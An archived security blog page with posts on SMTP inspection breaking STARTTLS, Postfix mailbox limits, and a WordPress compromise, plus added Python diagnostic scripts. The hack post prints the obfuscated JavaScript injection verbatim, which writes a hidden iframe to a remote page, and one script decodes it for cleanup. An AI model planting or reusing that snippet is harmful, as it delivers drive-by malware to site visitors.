Computer Network, System and Security stuff

Archive for June, 2008

About network attacks…

I will post a few examples of network attacks later. But before that, I want to clarify what I call a network attack.

I see many people confusing the use of this term, even professional or specialized journalists. Whenever a hack originates from the Internet, they call it a network attack.

This is a real misunderstanding. We will see why, when a website is hacked or a domain name spoofed, we cannot call it a network attack.

First of all, we need a good picture of the way the protocols of the Internet are organized.

We can visualize it with the OSI model, whose diagram is below :

This model defines 7 layers to hold all the protocols involved in transporting data from a system or program on a local computer to its peer on the other side of the network.


Postfix : TLS not working outside my network

As I had just finished setting up TLS and SASL to secure access to my Postfix server, I realized that it was only working from inside my network.

What I got from my LAN :

$ telnet mars 25
Trying 192.168.222.10...
Connected to phocean.net.
Escape character is '^]'.
220 phocean.net ESMTP Postfix (Debian/GNU)
ehlo phocean.net
250-phocean.net
250-PIPELINING
250-SIZE 200000000
250-VRFY
250-ETRN
250-STARTTLS
250-AUTH NTLM DIGEST-MD5 CRAM-MD5
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN

It shows that STARTTLS is advertised, so the TLS handshake can be initiated.

But from the outside, I just got this weird thing :

$ telnet phocean.net 25
Trying 81.64.194.119...
Connected to phocean.net.
Escape character is '^]'.
220 **********************************************
ehlo phocean.net
502 5.5.2 Error: command not recognized

Of course, the firewall, a Cisco PIX, was properly set to redirect port 25 UDP/TCP to my server.

However, I soon focused my effort on this device. I considered for a while that the cause could be some filtering by my provider, but most probably the problem came from the PIX.

That was not difficult to figure out : it had a protocol inspector activated for SMTP :

$ sh ru
[...]
fixup protocol smtp 25
[...]

Just after :

> no fixup protocol smtp 25

… it started to work perfectly well !!!

The SMTP inspection engine did not recognize the TLS handshake, considered the SMTP session invalid and therefore blocked it !

I can deactivate it without any fear, as my Postfix server is already pretty well secured, or at least configured to reject any weird SMTP dialog.
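The two telnet sessions above are easy to compare by eye, but the check is worth automating so it can be rerun after any firewall change. The script below is an added example, not code from the original post: it parses the server side of a connect + EHLO exchange and flags exactly the two symptoms of the outside session on this page (a banner masked with asterisks, and an EHLO that is answered with 502 instead of an extension list, so STARTTLS is never offered). The `INSIDE` and `OUTSIDE` transcripts are the ones quoted in the post; `probe()` is an assumed live equivalent built on Python's standard `smtplib`, and `probe.example` is a placeholder client name.

```python
"""Added example (not part of the original post): check what an SMTP server
advertises from inside and from outside the network, as the post does with
telnet, and flag a masked banner or a rejected EHLO (no STARTTLS offered)."""
import re
import smtplib

# Server-side lines of the two telnet sessions quoted in the post.
INSIDE = """\
220 phocean.net ESMTP Postfix (Debian/GNU)
250-phocean.net
250-PIPELINING
250-SIZE 200000000
250-VRFY
250-ETRN
250-STARTTLS
250-AUTH NTLM DIGEST-MD5 CRAM-MD5
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
"""
OUTSIDE = """\
220 **********************************************
502 5.5.2 Error: command not recognized
"""

# SMTP reply line: 3-digit code, then "-" (more lines follow) or " " (last line).
REPLY = re.compile(r"^(\d{3})([ -])(.*)$")


def analyze_transcript(text):
    """Summarise the server replies of one connect + EHLO exchange."""
    banner = None
    ehlo_code = None
    ehlo_lines = []
    for line in text.splitlines():
        m = REPLY.match(line.strip())
        if not m:
            continue  # client commands ("ehlo ...") and telnet noise
        code, _sep, rest = m.groups()
        if banner is None:
            if code == "220":
                banner = rest
            continue
        if ehlo_code is None:
            ehlo_code = code
        if code == "250":
            ehlo_lines.append(rest)
    # The first 250 line is the server's name; the rest are "KEYWORD [params]".
    extensions = {}
    for rest in ehlo_lines[1:]:
        parts = rest.split()
        extensions[parts[0].upper()] = parts[1:]
    masked = banner is not None and "*" in banner and not re.search(r"[A-Za-z0-9]", banner)
    return {
        "banner": banner,
        "banner_masked": masked,
        "ehlo_accepted": ehlo_code == "250",
        "starttls": "STARTTLS" in extensions,
        "auth": extensions.get("AUTH", []),
        "size": int(extensions["SIZE"][0]) if extensions.get("SIZE") else None,
    }


def compare_views(inside_text, outside_text):
    """List what differs between the inside and outside view; empty means consistent."""
    inside, outside = analyze_transcript(inside_text), analyze_transcript(outside_text)
    findings = []
    if outside["banner_masked"] and not inside["banner_masked"]:
        findings.append("banner is masked from outside: a device in the path rewrites SMTP")
    if inside["ehlo_accepted"] and not outside["ehlo_accepted"]:
        findings.append("EHLO rejected from outside: ESMTP extensions cannot be negotiated")
    if inside["starttls"] and not outside["starttls"]:
        findings.append("STARTTLS advertised inside but not outside: remote clients stay in cleartext")
    return findings


def probe(host, port=25, timeout=10, ehlo_name="probe.example"):
    """Live version of the telnet test (assumed helper); ehlo_name is a placeholder."""
    lines = []
    server = smtplib.SMTP(timeout=timeout)
    try:
        code, banner = server.connect(host, port)
        lines.append(f"{code} {banner.decode(errors='replace')}")
        code, msg = server.ehlo(ehlo_name)
        for part in msg.decode(errors="replace").splitlines():
            lines.append(f"{code} {part}")
    finally:
        server.close()
    return analyze_transcript("\n".join(lines))
```

Run `compare_views(probe("mars"), probe("phocean.net"))` from a host that can reach both names; three findings, as with the two captured transcripts, point at a device in the path rather than at Postfix.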

Hacked !

This blog got hacked yesterday.

It looks like some spammer managed to inject PHP code into almost all the *.php files of WordPress.
It was not like the classic SQL injection that is usually used to publish a malicious post.

The following code was added :

<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>
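The injected script only hides its real content behind a shift: every character of the `count("...")` argument is stored two code points above the real one, and the browser shifts them back before `document.write`. The script below is an added example, not code from the original post: it finds that snippet in PHP source without executing anything, applies the inverse shift, and returns the HTML the page would have written (for the line above, a 1x1 iframe that loads a remote page). `INJECTED` is the exact line quoted in the post; `scan_tree()` is an assumed helper that walks a WordPress directory to list the affected files for cleanup.

```python
"""Added example (not part of the original post): locate the injected
count() snippet in PHP source and recover the markup it writes, by undoing
the script's own "n - (2)" character shift. Nothing is executed."""
import os
import re

# The script's own shift expression and its document.write(count("...")) call.
SHIFT_RE = re.compile(r"String\.fromCharCode\(\s*n\s*-\s*\(\s*(\d+)\s*\)\s*\)")
PAYLOAD_RE = re.compile(r'document\.write\(count\("((?:[^"\\]|\\.)*)"\)\)')

# The exact line the post reports finding in its .php files.
INJECTED = r'''<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>'''


def shift_decode(payload, shift):
    """Inverse of the script's loop: move every character down by `shift`."""
    return "".join(chr(ord(c) - shift) for c in payload)


def js_unescape(s):
    """Undo the backslash escapes used inside the JS double-quoted string (\\" -> ")."""
    return re.sub(r"\\(.)", r"\1", s)


def decode_injected(php_source):
    """Return the decoded markup for every injected snippet found in php_source."""
    found = []
    for m in PAYLOAD_RE.finditer(php_source):
        # Read the shift from the count() definition preceding this call; the
        # sample uses 2, which is also the fallback if the definition is missing.
        shift_m = SHIFT_RE.search(php_source[: m.start()])
        shift = int(shift_m.group(1)) if shift_m else 2
        found.append(shift_decode(js_unescape(m.group(1)), shift))
    return found


def scan_tree(root):
    """Assumed helper: map each .php file under root to the markup it would inject."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    decoded = decode_injected(fh.read())
            except OSError:
                continue
            if decoded:
                hits[path] = decoded
    return hits


if __name__ == "__main__":
    for markup in decode_injected(INJECTED):
        print(markup)
```

Running `scan_tree("/path/to/wordpress")` (path is a placeholder) gives the list of files to restore from a clean copy; the decoded markup is what to look for in the served pages to confirm the cleanup worked.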


Postfix : “error writing message: File too large”

I suddenly started to receive undelivered-mail notifications while trying to send messages to a mailbox hosted on my Postfix server.

The cause described in the notification was :

error writing message: File too large

The first thing I did was check my configuration file, main.cf.
It seemed all right :

[...]
mailbox_size_limit = 0
message_size_limit = 200000000
[...]

Note that “0” means unlimited.
I checked the mailbox in question : it was nearing the size of 50 Mb.

I started to think that during some Postfix update, the meaning of the value “0” might have changed.
I tried different values without success.

I was about to go crazy with that, but finally, after quite a long time spent on Google, I found the trick, which is just a simple line to add to main.cf :

virtual_mailbox_limit = 0

Indeed, I use virtual users as mail accounts ! I just never imagined there was a different setting for virtual users (which can be a convenient setting in some cases).
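The trap here is that `mailbox_size_limit` only governs local(8) delivery, while virtual mailboxes are capped by `virtual_mailbox_limit`, whose documented postconf(5) default is 51200000 bytes, which is why the mailbox stalled near 50 Mb even with `mailbox_size_limit = 0`. The script below is an added example, not from the original post: it reads main.cf-style `name = value` lines (what `postconf -n` prints), fills in the documented defaults for anything unset, and reports which limit actually applies. `MAIN_CF_BEFORE` is the excerpt quoted above and `MAIN_CF_AFTER` the same plus the fixing line.

```python
"""Added example (not part of the original post): a small consistency check
for the Postfix size limits behind "File too large"."""

# Documented postconf(5) defaults, in bytes; 0 means "no limit".
DEFAULTS = {
    "message_size_limit": 10240000,
    "mailbox_size_limit": 51200000,      # local(8) delivery only
    "virtual_mailbox_limit": 51200000,   # virtual(8) delivery only
}

# The excerpt from the post's main.cf, and the same plus the line that fixed it.
MAIN_CF_BEFORE = """\
mailbox_size_limit = 0
message_size_limit = 200000000
"""
MAIN_CF_AFTER = MAIN_CF_BEFORE + "virtual_mailbox_limit = 0\n"


def parse_main_cf(text):
    """Return {name: value} for one-line settings in a main.cf excerpt.
    Indented continuation lines are not handled; `postconf -n` prints none."""
    params = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        name, value = (part.strip() for part in line.split("=", 1))
        params[name] = value
    return params


def effective_limits(params):
    """Apply the defaults so the number Postfix will actually enforce is visible."""
    limits = {}
    for name, default in DEFAULTS.items():
        value = params.get(name, "")
        limits[name] = int(value) if value.isdigit() else default
    return limits


def check_limits(text, virtual_users=True):
    """Findings for a main.cf excerpt; an empty list means the limits are consistent."""
    params = parse_main_cf(text)
    limits = effective_limits(params)
    box_param = "virtual_mailbox_limit" if virtual_users else "mailbox_size_limit"
    box, msg = limits[box_param], limits["message_size_limit"]
    findings = []
    if virtual_users and "mailbox_size_limit" in params and "virtual_mailbox_limit" not in params:
        findings.append(
            "mailbox_size_limit is set but virtual_mailbox_limit is not: "
            f"virtual mailboxes keep the default of {DEFAULTS['virtual_mailbox_limit']} bytes"
        )
    if box and msg > box:
        findings.append(
            f"{box_param} = {box} is below message_size_limit = {msg}: "
            "a message Postfix accepts can still fail with 'File too large'"
        )
    return findings


if __name__ == "__main__":
    for label, cf in (("before", MAIN_CF_BEFORE), ("after", MAIN_CF_AFTER)):
        print(label, effective_limits(parse_main_cf(cf)), check_limits(cf) or "ok")
```

Feeding it the real output of `postconf -n` (pipe it into a file and pass its contents to `check_limits`) shows the mismatch before a mailbox fills up, instead of after the bounces start.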

Still buying movies offline?